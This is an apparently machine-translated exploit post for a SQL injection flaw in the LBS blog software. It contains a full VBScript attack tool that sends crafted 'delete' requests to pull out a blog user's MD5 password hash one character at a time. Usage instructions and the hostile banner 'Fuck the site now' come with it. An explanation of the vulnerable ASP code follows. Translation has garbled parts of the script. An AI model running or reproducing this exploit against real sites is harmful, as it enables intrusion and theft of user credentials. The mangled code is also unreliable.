LBS blog SQL injection vulnerability [All version]-patches already available

It just proves that the vulnerability exists.
Exp is as follows. Save it as vbs. Test yourself in the next program.

'From Jianxin
'================================================ ============================================
'Usage instructions:
'At the command prompt:
'Cscript.exe lbsblog. vbs: the blog path of the website to be attacked. Valid Article id: the password of the blog user to be cracked
For example:
'Cscript.exe lbsblog. vbs www.xxxx.com/blog/ 1 1
'By loveshell
'================================================ ============================================
On Error Resume Next
Dim oArgs
Dim olbsxml'xmlhttp object used to open the target URL
Dim targeturl' target URL
Dim userid, articleid 'blog Username
Dim TempStr 'store some obtained MD5 passwords
Dim charhex' defines hexadecimal characters
Dim charset

Set oArgs = WScript. arguments
If oArgs. count <1 Then Call ShowUsage ()


Set olbsXML = createObject ("Microsoft. XMLHTTP ")

'Fill in the complete target URL
TargetURL = oArgs (0)
If LCase (Left (TargetURL, 7) <> "http: //" Then TargetURL = "http: //" & TargetURL
If right (TargetURL, 1) <> "/" Then TargetURL = TargetURL &"/"
TargetURL = TargetURL & "article. asp"

Articleid = oArgs (1)
Userid = oArgs (2)
TempStr = ""
CharHex = Split (", a, B, c, d, e, f ",",")


WScript. echo "LBS blog All version Exploit" & vbcrlf
WScript. echo "By Jianxin" & vbcrlf
WScript. echo "http://www.loveshell.net/Just For fun :)" & vbcrlf
WScript. echo "+ Fuck the site now" & vbcrlf

Call main (TargetURL, BlogName)

Set oBokeXML = Nothing


'---------------------------------------------- Sub -------------------------------------------------------
'================================================ =====
'Function name: main
'Function function: main program, injection to obtain the password of the blog user
'================================================ =====
Sub main (TargetURL, BlogName)
Dim MainOffset, SubOffset, TempLen, OpenURL, GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
Postdata = ""
Postdata = articleid & "and (select left (user_password," & MainOffset & ") from blog_user where user_id =" & userid & ") = '" & TempStr & CharHex (SubOffset) &"'"

OpenURL = TargetURL

OlbsXML. open "Post", OpenURL, False ,"",""
OlbsXML. setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
OlbsXML. send "act = delete & id =" & escape (postdata)
GetPage = BytesToBstr (olbsXML. ResponseBody)
'Determine whether the accessed page exists
If InStr (GetPage, "deleted") <> 0 Then
'"The blog user does not exist or the entered information is incorrect" indicates an error mark. If this mark is returned, it indicates that the MD5 of the guess is incorrect.
'If you get the MD5 value of 0000000000000000, modify the error flag.
ElseIf InStr (GetPage, "permission") <> 0 Then
TempStr = TempStr & CharHex (SubOffset)
WScript. Echo "+ Crack now:" & TempStr
Exit
Else
WScript. echo vbcrlf & "Something error" & vbcrlf
WScript. echo vbcrlf & GetPage & vbcrlf
WScript. Quit
End If
Next
Next
WScript. Echo vbcrlf & "+ We Got It:" & TempStr & vbcrlf & ": P Don't Be edevil"
End sub

'================================================ =====
'Function name: BytesToBstr
'Function: Convert the content in the XMLHTTP object to GB2312 encoding.
'================================================ =====
Function BytesToBstr (body)
Dim objstream
Set objstream = createObject ("ADODB. Stream ")
Objstream. Type = 1
Objstream. Mode = 3
Objstream. Open
Objstream. Write body
Objstream. Position = 0
Objstream. Type = 2
Objstream. Charset = "GB2312"
BytesToBstr = objstream. ReadText
Objstream. Close
Set objstream = nothing
End Function

'==================================
'Function name: ShowUsage
'Function: usage tips
'==================================
Sub ShowUsage ()
WScript. echo "LBS blog Exploit" & vbcrlf & "By Loveshell/Jianxin"
WScript. echo "Usage:" & vbcrlf & "CScript" & WScript. ScriptFullName & "TargetURL BlogName"
WScript. echo "Example:" & vbcrlf & "CScript" & WScript. ScriptFullName & "http://www.loveshell.net/1"
WScript. echo ""
WScript. Quit
End Sub



Vulnerability description:

In src_article.asp
......
Input ["log_id"] = func. checkInt (input ["log_id"]);
If (! Input ["id"]) {
StrError = lang ["invalid_parameter"];
} Else {
// Check if the article exists
TheArticle. load ("log_id, log_authorID, log_catID", "log_id =" + input ["id"]);
StrError = false;
}
......


The log_id is filtered, but the id is used :)

What then?
Code in class/article. asp
This. load = function (strselect, strwhere ){
Var tmpA = connBlog. query ("select TOP 1" + strselect + "FROM [blog_Article] where" + strwhere );
If (tmpA ){
This. fill (tmpA [0]);
Return true;
} Else {
Return false;
}
}


I don't need to mention it, huh, huh, but the trigger requires conditions. It cannot be met!

Function articledelete (){
If (theUser. rights ["delete"] <1 ){
// Check User Right-without DB Query
PageHeader (lang ["error"]);
RedirectMessage (lang ["error"], lang ["no_rights"], lang ["goback"], "javascript: window. history. back (); ", false," errorbox ");
} Else {
Var theArticle = new lbsArticle ();
Var strError;



By default, all guest users have the delete permission. Although some judgment is made later, the injection has already taken place, and we just use his judgment to inject the injection.